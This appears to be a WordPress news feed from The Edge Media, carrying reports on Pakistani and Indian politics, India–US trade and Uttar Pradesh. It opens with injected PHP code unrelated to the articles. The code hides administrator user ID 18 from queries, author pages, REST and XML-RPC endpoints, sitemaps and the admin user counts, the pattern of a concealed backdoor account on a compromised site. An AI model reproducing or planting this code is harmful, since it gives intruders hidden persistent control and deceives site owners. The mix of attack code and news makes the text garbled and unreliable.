add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 18;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 18 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 18 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 18;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 18;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/18(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 18;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
The post “Pakistan has failed to learn from its past mistakes.” - Khwaja Asif appeared first on The Edge Media.
]]>The Minister stated that re-engaging with the United States after 2001 was a significant error that resulted in long-term damage to Pakistan. He argued that the support for the US in the Afghanistan conflict was driven by a desire for political legitimacy and superpower backing rather than religious or national necessity, and the country has been suffering the consequences for decades.
Asif also pointed inward, stating that Pakistan has failed to learn from its past mistakes. He noted that following the withdrawal of Soviet forces from Afghanistan, the nation did not adjust its course, leading it to “rent itself out” for another two decades after the September 11 attacks. He attributed the rise of terrorism and extremism to the decisions made by past military dictators, specifically mentioning Zia-ul-Haq and Pervez Musharraf, whom he accused of pushing the country into foreign wars that damaged the economy and society.
Furthermore, the Defense Minister highlighted that none of the perpetrators of the 9/11 attacks were Afghan, yet Pakistan became embroiled in the ensuing war, a decision he believes severely compromised national security and foreign policy.
The post “Pakistan has failed to learn from its past mistakes.” - Khwaja Asif appeared first on The Edge Media.
]]>The post Opposition Moves No-Confidence Motion Against Lok Sabha Speaker Om Birla appeared first on The Edge Media.
]]>The opposition has leveled serious allegations against the Speaker, primarily focusing on the suppression of the Leader of the Opposition’s voice during the Motion of Thanks on the President’s Address and the forced suspension of eight members. In response to these developments, sources indicate that Om Birla has decided on ethical grounds not to occupy the Speaker’s chair until the matter is resolved.
The Lok Sabha Secretariat has confirmed that proceedings will follow established rules. The notice was handed over to Secretary General Utpal Kumar Singh by a delegation including Congress Deputy Leader Gaurav Gogoi, Chief Whip K. Suresh, and MP Mohammad Javed, among others. While members from the Congress, SP, DMK, and RJD have signed the notice, notable absences include the signatures of Rahul Gandhi and members of the TMC.
Four Major Allegations by the Opposition:
* February 2: Opposition leader Rahul Gandhi was allegedly prevented from completing his speech during the Motion of Thanks on the President’s Address.
* February 3: Eight MPs were suspended for the remainder of the session, a move the opposition describes as punishment for exercising democratic rights.
* Nishikant Dubey Case: The notice mentions objectionable remarks made against former Prime Ministers without naming Nishikant Dubey.
* Misuse of Office: The opposition rejected the Speaker’s claim that Congress members intended to cause an “untoward incident” near the Prime Minister’s seat, calling such accusations a blatant misuse of a constitutional position.
The post Opposition Moves No-Confidence Motion Against Lok Sabha Speaker Om Birla appeared first on The Edge Media.
]]>The post Strict Crackdown on Cyber Fraud, Says Amit Shah appeared first on The Edge Media.
]]>Shah was addressing a conference organized with the support of the Ministry of Home Affairs and the Indian Cyber Crime Coordination Centre. He stated that the mule account detection system developed by the ministry should be adopted by all banks to prevent misuse of financial channels by criminals.
Highlighting the growing threat, the Home Minister said that in the country one person falls victim to cyber fraud every 37 seconds. On average, about 90 individuals are cheated every hour. As digital transactions continue to rise rapidly, the risk associated with cyber crimes is also increasing. He noted that these crimes are emerging in an organized manner and criminals are adopting new technologies, making collective action essential.
Shah also instructed police officials to ensure adequate staffing at the 1930 cyber helpline call centers so that complaints can be handled promptly and effectively.
In a separate development, the central government has tightened regulations for social media platforms. Under the new rules, any photo or video created using artificial intelligence must carry a clear label indicating that it is AI generated. If any unlawful or misleading content is uploaded on these platforms, companies will be required to remove it within three hours of receiving information about it.
The new regulations will come into effect from February 20. Non compliance may invite strict action and financial penalties. The government stated that these measures aim to enhance transparency, prevent misuse of technology and strengthen the country’s cyber security framework.
The post Strict Crackdown on Cyber Fraud, Says Amit Shah appeared first on The Edge Media.
]]>The post Uttar Pradesh Economy Doubles in Nine Years, Claims Yogi Government appeared first on The Edge Media.
]]>According to the report, the state’s Gross State Domestic Product was around Rs 13.30 lakh crore in 2016 to 17. It increased steadily over the years and reached approximately Rs 30.25 lakh crore in 2024 to 25. For the financial year 2025 to 26, the economy is projected to cross Rs 36 lakh crore. The report highlighted that Uttar Pradesh has emerged as one of the fastest growing state economies in the country.
The Economic Review also pointed to consistent improvement in growth rates. The state’s growth rate, which was around 8.6 percent in 2016 to 17, is estimated to have risen to 9.1 percent in 2024 to 25. The government said that this reflects sustained economic expansion and better financial management.
Among the key highlights of the review, the per capita income in 2025 to 26 is expected to reach around Rs 1,20,000. The government said that efforts are being made to ensure balanced development across agriculture, industry and the service sector. It added that investment in infrastructure, digital economy and green energy has been prioritised to strengthen long term growth.
The report mentioned that the Ayodhya airport has been made operational and five international airports are expected to be functional in the state, further boosting connectivity and economic activity. Measures have also been taken to improve ease of doing business and attract private investment.
Before the start of the Budget Session, Chief Minister Yogi Adityanath said that this is the tenth Budget of his government and reflects the aspirations of the people. He stated that dialogue and coordination among departments are essential for effective governance and development.
Governor Anandiben Patel, in her address to the joint session of the Legislature, described Uttar Pradesh as a Breakthrough State. She said that over the past nine years, the state has moved beyond its earlier image and is now being recognised for effective law and order, economic reforms, agricultural progress, women empowerment and infrastructure development.
The Governor added that the government’s policies, administrative efficiency and focus on development have strengthened public confidence. She also said that the law and order situation in the state now meets national standards and has contributed to attracting investment.
The Economic Review further noted that per capita income, which stood at around Rs 54,564 in 2016 to 17, increased to nearly Rs 1,09,844 in 2024 to 25. It is projected to cross Rs 1,20,000 in 2025 to 26. Urbanisation is also rising steadily, with the share of the urban population expected to increase significantly by 2046.
The government emphasised that its focus remains on employment generation, inclusive growth and making Uttar Pradesh self reliant while strengthening its position as a major economic power in the country.
The post Uttar Pradesh Economy Doubles in Nine Years, Claims Yogi Government appeared first on The Edge Media.
]]>The post Iran Says It Will Not Be Intimidated by US Threats appeared first on The Edge Media.
]]>Speaking at a conference in Tehran, Iran’s Foreign Minister Abbas Araghchi said that during recent discussions with American representatives, Iran clearly communicated that it would not abandon uranium enrichment. He stressed that Iran would not yield to pressure from powerful nations and that intimidation would not influence its decisions.

Araghchi added that no country has the authority to dictate Iran’s behavior or determine its national interests. Referring to the recent deployment of an American aircraft carrier in nearby waters, he said Iran is not afraid of US military positioning in the region. According to him, such actions do not weaken Tehran’s resolve.
On the issue of Iran’s missile program, Araghchi stated that Tehran does not consider it open for negotiation, as it is directly linked to national security. He reiterated that Iran seeks to avoid confrontation but is prepared to respond if attacked.
The foreign minister also expressed deep mistrust toward Washington, saying Tehran has little confidence in the United States. He questioned whether the American side is genuinely serious about pursuing fresh negotiations. Commenting on new sanctions imposed by the US administration, Araghchi said that while Washington speaks of peace, its actions raise doubts about its true intentions.
He said Iran is closely monitoring the situation and will soon decide whether to continue the talks or reconsider its participation. Meanwhile, senior American officials, including key negotiators, recently visited the US aircraft carrier USS Abraham Lincoln, signaling heightened attention to the developments in the region.
The ongoing diplomatic standoff underscores the fragile nature of relations between the two countries, with both sides maintaining firm positions on critical security and nuclear issues.
The post Iran Says It Will Not Be Intimidated by US Threats appeared first on The Edge Media.
]]>The post No Concern Over 500 Billion Dollar Imports From US in Five Years, Says Piyush Goyal appeared first on The Edge Media.
]]>Speaking in New Delhi, Goyal explained that India currently imports goods worth nearly 300 billion dollars from the US. With steady economic expansion, this figure could rise significantly in the coming years. He stated that India’s economy is expected to create demand worth nearly two trillion dollars, making higher imports manageable. He assured that while India welcomes trade, it will remain competitive in the global market.
Goyal emphasized that adequate safeguards have been incorporated in the trade understanding with the United States to protect the interests of Indian farmers and domestic industries. He said that the government has carefully negotiated the terms to ensure that sensitive sectors are not adversely affected.
Referring to the livestock and poultry sectors, the minister noted that India has agreed to certain tariff rate quotas for products such as corn based animal feed, also known as DDGS. He said this decision would strengthen the poultry and animal husbandry sectors by ensuring access to quality feed at competitive prices.
Goyal added that India is negotiating trade agreements with confidence and strength. He pointed out that India could access a market worth 35 trillion dollars in the future through such partnerships. According to him, the objective of these agreements is to expand opportunities for Indian goods and services globally.
The minister further stated that Indian farmers are already exporting agricultural products worth 50 to 55 billion dollars. With improved access to international markets, including the United States, farmers are expected to benefit from better prices and higher demand. He highlighted that Indian products will gain a competitive advantage in the American market, especially when compared with countries that face higher tariffs.
Meanwhile, political reactions have also emerged. Punjab BJP president Sunil Jakhar said that the India US trade understanding would boost economic development and create new employment opportunities for youth. He remarked that the agreement was finalized after detailed discussions and careful consideration.
On the other hand, the Communist Party of India Marxist expressed concern, alleging that the agreement could pose risks to the country’s economic sovereignty. The party claimed that excessive concessions may have been granted to the United States. In response, the Prime Minister’s Office clarified that national interests remain paramount in all trade negotiations.
Overall, the government maintains that the proposed expansion in trade with the United States will strengthen India’s economy, generate jobs, support farmers, and safeguard domestic industries while enhancing India’s position in global markets.
The post No Concern Over 500 Billion Dollar Imports From US in Five Years, Says Piyush Goyal appeared first on The Edge Media.
]]>The post No Import Duty on 44 Billion Dollar US Exports to India Says Piyush Goyal appeared first on The Edge Media.
]]>Goyal explained that around 30 billion dollars worth of Indian goods exported to the United States will continue to face an average tariff of 18 percent, which includes labour-intensive products. However, nearly 12 billion dollars worth of Indian exports, including some agricultural items, will see no change in the existing duty structure.
He further stated that commodities such as steel, aluminium, copper and automobile components are currently subject to uniform tariffs across countries. The United States imposes up to 50 percent duty on these items, but this was introduced as an interim measure. India expects these rates to be reviewed and adjusted in the first phase of the upcoming bilateral trade agreement.
The minister highlighted that the government aims to ensure balanced trade growth while protecting domestic industries. He added that the proposed trade framework will help improve market access and strengthen economic ties between the two nations.
No Import Duty on These Products
According to the minister, agricultural products including meat, poultry, dairy products, apples, tree nuts, soya meal, oilseeds, grains, maize, barley, fruits such as bananas and berries, dry fruits, pulses, chickpeas, lentils, pet food, honey and malt will not attract import duty.
India–US Trade Measures to Protect Domestic Industry
Goyal clarified that India remains firm on safeguarding its farmers and micro, small and medium enterprises. He said India will continue to raise concerns at international forums against unfair trade practices and dumping. The country’s approach is to strengthen its manufacturing base while maintaining fair competition.
Boeing and Airbus Orders to Increase
The commerce minister noted that India is likely to increase aircraft purchases from Boeing and Airbus in the future. He said several Indian airlines have already held discussions with the top management of both companies regarding fleet expansion and long-term supply arrangements.
Quota-Based Duty Relief on Apples
Under the proposed trade arrangement, India will provide quota-based duty concessions on apples imported from the United States. Imports beyond the quota limit will attract a 25 percent duty. The quota will be capped at 80,000 metric tonnes annually.
On Tariff Parity
Responding to a query, Goyal said that zero-duty access under the agreement would improve India’s competitiveness in the US market. He pointed out that while the per capita income in the United States is around 90,000 dollars, India’s per capita income stands close to 3,000 dollars, making balanced trade policies essential.
The post No Import Duty on 44 Billion Dollar US Exports to India Says Piyush Goyal appeared first on The Edge Media.
]]>The post India–US Trade Corridor Gets a Boost as Both Nations Finalise Trade Readiness appeared first on The Edge Media.
]]>Under the proposed arrangement, the United States is expected to reduce import duties on several Indian products. Tariffs on select categories are likely to be lowered from the existing levels of around 50 percent to nearly 18 percent, significantly improving the competitiveness of Indian goods in the American market. In return, India will rationalise duties on a range of US industrial and agricultural imports in line with global trade practices.
The agreement is projected to open an export opportunity worth nearly 30 billion dollars for India. Sectors such as generic pharmaceuticals, medical supplies, ready-made garments, leather goods, footwear, machinery, handicrafts, plastics and rubber products are expected to benefit directly. Agricultural and food items including tea, coffee, spices, fruits, soyabean oil, animal feed, dairy inputs and processed food products are also likely to gain from improved access and lower duties.
Government sources indicated that care has been taken to ensure that the interests of Indian farmers and the domestic agriculture sector are protected. No provision in the understanding is expected to adversely impact dairy or core farming activities. The focus remains on expanding exports while maintaining food security and supporting rural livelihoods.
Prime Minister Narendra Modi said the framework would deepen investment and technology partnerships between the two countries and create new opportunities for farmers, workers and entrepreneurs. He added that the initiative aligns with the Make in India vision and would contribute to job creation and long-term economic growth.
Uttar Pradesh Chief Minister Yogi Adityanath described the development as a major achievement under India’s current leadership, stating that it would enhance India’s global standing as a reliable manufacturing and export hub while safeguarding national interests.
The post India–US Trade Corridor Gets a Boost as Both Nations Finalise Trade Readiness appeared first on The Edge Media.
]]>The post Protests Erupt Across Uttar Pradesh Over Controversial Film Allegations appeared first on The Edge Media.
]]>According to the complaint, the film includes dialogues and scenes that allegedly promote caste based humiliation. It has been stated that the film’s title itself appears to be designed to demean a specific community. The controversy intensified after promotional content circulated on streaming platforms and social media, triggering strong reactions from various sections of society.
In Prayagraj, members of the Rashtriya Parashuram Sena Brahmavahini staged a protest and burned an effigy of the film’s producer at Subhash Chauraha. In Varanasi, Brahmin groups gathered at the Ahilyabai Ghat to demonstrate against the film. Protesters demanded an immediate change to the film’s title and strict action against those responsible.
Political reactions also added to the controversy. Samajwadi Party national president Akhilesh Yadav alleged that the content visible on OTT platforms reflects the preferences of the ruling Bharatiya Janata Party. He claimed that platforms showcase material aligned with government interests while films and television shows critical of the government face restrictions.
Further escalation occurred after warnings were issued that symbolic rituals would be conducted for actor Manoj Bajpayee and others associated with the film as a mark of protest. Senior police officials in Lucknow confirmed that legal action would be taken based on evidence presented in the case. Authorities stated that investigations would proceed against the film’s director and production team in accordance with the law.
Law enforcement agencies have maintained heightened vigilance to prevent any breach of public order as tensions remain high in several districts.
The post Protests Erupt Across Uttar Pradesh Over Controversial Film Allegations appeared first on The Edge Media.
]]>The post Election Commission Extends Claims and Objections Deadline for SIR Until March 6 appeared first on The Edge Media.
]]>Chief Electoral Officer Navdeep Rinwa said the extension was granted to ensure transparency and give voters adequate opportunity to verify their details ahead of the ongoing Assembly election preparations. He clarified that the entire process is being carried out in a time bound and transparent manner.
According to officials, the draft electoral roll was published on February 27. Notices were issued to nearly nine percent of voters whose verification was required. So far, hearings have been completed for a large number of these cases, while the remaining hearings will conclude by March 27.
Rinwa stated that names will not be removed from the voter list without due process. Any deletion will only take place after proper verification and hearings. If a complaint is found to be baseless, no further action will be taken. The Election Commission has instructed Booth Level Officers not to remove names arbitrarily.
Officials also clarified that a voter can raise objections only within the same Assembly constituency. Each voter is allowed to submit only one form with supporting documents. Political parties have submitted a large number of Booth Level Agent forms, with Form 10 submissions crossing 5.79 lakh.
As of now, more than 9.50 lakh voters have submitted Form 8 for correction of details such as name and address. On February 5 alone, a record 59,840 Form 8 applications were received.
Door to door verification is also underway. Notices are being delivered to around 3.26 crore voters, including approximately 2.22 crore migrated voters. Booth Level Officers are visiting households to verify details and resolve cases through document verification.
The Election Commission has also increased the number of Assistant Electoral Registration Officers to speed up hearings. The total number of AEROs has now risen to 8,990 from 6,948 earlier.
Officials added that 1.04 crore voters who were not part of the 2003 electoral roll and 2.22 crore migrated voters are currently under verification. Notices have already reached over 86.27 lakh households, and hearings for more than 30.30 lakh cases have been completed.
The post Election Commission Extends Claims and Objections Deadline for SIR Until March 6 appeared first on The Edge Media.
]]>